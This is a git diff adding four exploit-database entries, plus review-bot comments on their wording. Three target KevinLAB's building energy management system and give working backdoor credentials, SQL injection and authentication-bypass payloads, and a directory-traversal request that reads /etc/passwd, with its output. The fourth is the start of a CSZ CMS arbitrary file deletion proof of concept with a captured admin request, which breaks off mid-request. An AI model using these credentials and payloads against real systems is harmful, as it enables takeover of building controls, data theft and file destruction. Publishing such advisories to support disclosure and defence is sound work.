diff --git a/exploits/hardware/remote/50145.txt b/exploits/hardware/remote/50145.txt new file mode 100644 index 000000000..fcf888523 --- /dev/null +++ b/exploits/hardware/remote/50145.txt 
@@ -0,0 +1,53 @@ +# Exploit Title: KevinLAB BEMS 1.0 - Undocumented Backdoor Account +# Date: 05.07.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.kevinlab.com + +Vendor: KevinLAB Inc. +Product web page: http://www.kevinlab.com +Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System) + +Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy +management platform. KevinLAB's BEMS (Building Energy Management System) enables +efficient energy management in buildings. It improves the efficient of energy use +by collecting and analyzing various information of energy usage and facilities in +the building. It also manages energy usage, facility efficiency and indoor environment +control. + +Desc: The BEMS solution has an undocumented backdoor account and these sets of +credentials are never exposed to the end-user and cannot be changed through any +normal operation of the solution thru the RMI. Attacker could exploit this +vulnerability by logging in using the backdoor account with highest privileges +for administration and gain full system control. The backdoor user cannot be +seen in the users settings in the admin panel and it also uses an undocumented +privilege level (admin_pk=1) which allows full availability of the features that +the BEMS is offering remotely. + +Tested on: Linux CentOS 7 + Apache 2.4.6 + Python 2.7.5 + PHP 5.4.16 + MariaDB 5.5.68 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5654 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php + + +05.07.2021 + +-- + + +Backdoor accounts from the DB: +------------------------------ + +Username: kevinlab (permission=1) +Password: kevin003 + +Username: developer1 (permission=6) +Password: 1234 \ No newline at end of file diff --git a/exploits/hardware/webapps/50146.txt b/exploits/hardware/webapps/50146.txt new file mode 100644 index 000000000..aa5d76abe --- /dev/null 
+++ b/exploits/hardware/webapps/50146.txt 
@@ -0,0 +1,62 @@ +# Exploit Title: KevinLAB BEMS 1.0 - Unauthenticated SQL Injection / Authentication Bypass +# Date: 05.07.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.kevinlab.com + +Vendor: KevinLAB Inc. +Product web page: http://www.kevinlab.com +Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System) + +Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy +management platform. KevinLAB's BEMS (Building Energy Management System) enables +efficient energy management in buildings. It improves the efficient of energy use +by collecting and analyzing various information of energy usage and facilities in +the building. It also manages energy usage, facility efficiency and indoor environment +control. + +Desc: The application suffers from an unauthenticated SQL Injection vulnerability. +Input passed through 'input_id' POST parameter in '/http/index.php' is not properly +sanitised before being returned to the user or used in SQL queries. This can be exploited +to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication +mechanism. 
+ +Tested on: Linux CentOS 7 + Apache 2.4.6 + Python 2.7.5 + PHP 5.4.16 + MariaDB 5.5.68 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5655 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php + + +05.07.2021 + +-- + + +PoC POST data payload (extract): +-------------------------------- + +POST /http/index.php HTTP/1.1 +Host: 192.168.1.3 + +requester=login +request=login +params=[{"name":"input_id","value":"USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}] + + +PoC POST data payload (authbypass): +----------------------------------- + +POST /http/index.php HTTP/1.1 +Host: 192.168.1.3 + +requester=login +request=login +params=[{"name":"input_id","value":"USERNAME' or 1=1--},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}] \ No newline at end of file diff --git a/exploits/hardware/webapps/50147.txt b/exploits/hardware/webapps/50147.txt new file mode 100644 index 000000000..43610198e --- /dev/null +++ b/exploits/hardware/webapps/50147.txt 
@@ -0,0 +1,57 @@ +# Exploit Title: KevinLAB BEMS 1.0 - File Path Traversal Information Disclosure (Authenticated) +# Date: 05.07.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.kevinlab.com + +Vendor: KevinLAB Inc. +Product web page: http://www.kevinlab.com +Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System) + +Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy +management platform. KevinLAB's BEMS (Building Energy Management System) enables +efficient energy management in buildings. It improves the efficient of energy use +by collecting and analyzing various information of energy usage and facilities in +the building. It also manages energy usage, facility efficiency and indoor environment +control. + +Desc: The BEMS suffers from an authenticated arbitrary file disclosure vulnerability. +Input passed through the 'page' GET parameter in index.php is not properly verified +before being used to include files. This can be exploited to disclose the contents +of arbitrary and sensitive files via directory traversal attacks. + +Tested on: Linux CentOS 7 + Apache 2.4.6 + Python 2.7.5 + PHP 5.4.16 + MariaDB 5.5.68 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5656 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5656.php + + +05.07.2021 + +-- + + +GET https://192.168.1.3/pages/index.php?page=../../../../etc/passwd HTTP/1.1 + +root:x:0:0:root:/root:/bin/bash +bin:x:1:1:bin:/bin:/sbin/nologin +daemon:x:2:2:daemon:/sbin:/sbin/nologin +adm:x:3:4:adm:/var/adm:/sbin/nologin +lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin +sync:x:5:0:sync:/sbin:/bin/sync +shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown +halt:x:7:0:halt:/sbin:/sbin/halt +mail:x:8:12:mail:/var/spool/mail:/sbin/nologin +operator:x:11:0:operator:/root:/sbin/nologin +games:x:12:100:games:/usr/games:/sbin/nologin +ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin +... +... 
\ No newline at end of file diff --git a/exploits/php/webapps/50148.txt b/exploits/php/webapps/50148.txt new file mode 100644 index 000000000..c3c580f01 --- /dev/null +++ b/exploits/php/webapps/50148.txt 
@@ -0,0 +1,356 @@ +# Exploit Title: CSZ CMS 1.2.9 - 'Multiple' Arbitrary File Deletion +# Date: 2021-07-20 +# Exploit Author: faisalfs10x (https://github.com/faisalfs10x) +# Vendor Homepage: https://www.cszcms.com +# Software Link: https://sourceforge.net/projects/cszcms/files/latest/download +# Version: 1.2.9 +# Tested on: Windows 10, XAMPP +# Reference: https://github.com/cskaza/cszcms/issues/32 + + +################ +# Description # +################ + +# CSZ CMS is an open source Content Management System web application that allows to manage all content and settings on the websites. CSZ CMS was built on the basis of Codeigniter3 and design the structure of Bootstrap3. When unsanitized user input is supplied to a file deletion function, an arbitrary file deletion vulnerability arises. This occurs in PHP when the unlink() function is called and user input might affect portions of or the whole affected parameter, which represents the path of the file to remove, without sufficient sanitization. Exploiting the vulnerability allows an attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker might leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints. + + +########## +# PoC 1 # +########## + +Vulnerable URL: http://localhost/CSZCMS-V1.2.9/admin/plugin/article/editArtSave +Vulnerable Code: line 116, 131 - cszcms\models\plugin\Article_model.php + +Steps to Reproduce: + +1. Login as admin +2. Goto Plugin Manager > Article > edit any article +3. Upload any image as "Main Picture" and "File Upload" and click save button +4. Click "Delete File" button for both "Main Picture" and "File Upload" and click save button +5. 
Intercept the request and replace existing image to any files on the server via parameter "del_file" and "del_file2" + + +1) Assumed there are files conf_secret_file.php and config_backup.txt in web root + +PoC #1) param del_file & del_file2 - Deleting conf_secret_file.php and config_backup.txt files in web root + +Request: +======== + +POST /CSZCMS-V1.2.9/admin/plugin/article/editArtSave/4 HTTP/1.1 +Host: localhost +Content-Length: 2048 +Cache-Control: max-age=0 +sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99" +sec-ch-ua-mobile: ?0 +Upgrade-Insecure-Requests: 1 +Origin: http://localhost +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAMyATk1BfQaBOHvY +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: http://localhost/CSZCMS-V1.2.9/admin/plugin/article/artedit/4 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: last_views=a%3A3%3A%7Bi%3A0%3Bi%3A17%3Bi%3A1%3Bi%3A19%3Bi%3A2%3Bi%3A18%3B%7D; __atuvc=5%7C27; c4204054ab0d5b68399458e70744010b_cszsess=l9f1kpqohequemh1q3tt11j36hs99c25 +Connection: close + +------WebKitFormBoundaryAMyATk1BfQaBOHvY +Content-Disposition: form-data; name="title" + +article beta +------WebKitFormBoundaryAMyATk1BfQaBOHvY +Content-Disposition: form-data; name="keyword" + +testing file +------WebKitFormBoundaryAMyATk1BfQaBOHvY +Content-Disposition: form-data; name="short_desc" + +deletion +------WebKitFormBoundaryAMyATk1BfQaBOHvY +Content-Disposition: form-data; name="cat_id" + +2 +------WebKitFormBoundaryAMyATk1BfQaBOHvY +Content-Disposition: form-data; name="content" + +
test for file deletion
+
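Review bot: In exploits/hardware/remote/50145.txt the Desc names the undocumented privilege level as admin_pk=1, but the account listing at the end of the file labels it permission=1 (and permission=6 for developer1). A reader cannot tell whether these are the same field or what level 6 grants. Use one field name throughout and state what each level allows. Since the Desc says the credentials "cannot be changed through any normal operation", a short line on what an operator can do in the meantime (restrict network access to the login interface, review authentication logs for the two usernames) would make the entry usable for defenders. The file also ends without a trailing newline.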
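Review bot: The Desc in exploits/hardware/webapps/50146.txt frames the defect as input_id being "not properly sanitised", which points a maintainer toward input filtering rather than the actual fix. Both requests show the input_id value reaching the login query as SQL, so the description should say that the value is concatenated into the query and that the remedy is binding it as a query parameter. It should also say whether the other fields in params (input_passwd, device_id, login_key) were tested, because the text currently covers only input_id. The file ends without a trailing newline.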
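Review bot: The Desc in exploits/hardware/webapps/50147.txt locates the flaw in the 'page' GET parameter "in index.php" without a path, while the request at the bottom uses /pages/index.php and the sibling entry 50146 refers to a different script, /http/index.php. Give the full path in the Desc so the affected endpoint can be scoped without reading the request line. The title says "(Authenticated)" but neither the Desc nor the request states which privilege level is required, which matters for triage. The twelve lines of /etc/passwd output could be cut to a single line, since one line already confirms the read.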
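Review bot: In the part of exploits/php/webapps/50148.txt visible here, the captured request under "PoC #1" keeps a full Cookie header, including a c4204054ab0d5b68399458e70744010b_cszsess session value, along with browser headers (sec-ch-ua, Sec-Fetch-*, User-Agent) that have no bearing on the issue. Replace the session value with a placeholder and trim the request to the method line, Host, Content-Type and the relevant form fields. The numbering is also confusing: "1) Assumed there are files ..." follows the numbered reproduction steps 1 to 5 and reads like a restart of that list, so label it as a precondition instead. The description attributes the root cause to unlink() being called on user-controlled input and cites lines 116 and 131 of Article_model.php, so a sentence on the expected fix (resolve the supplied name against the upload directory and reject anything outside it) would complete the entry.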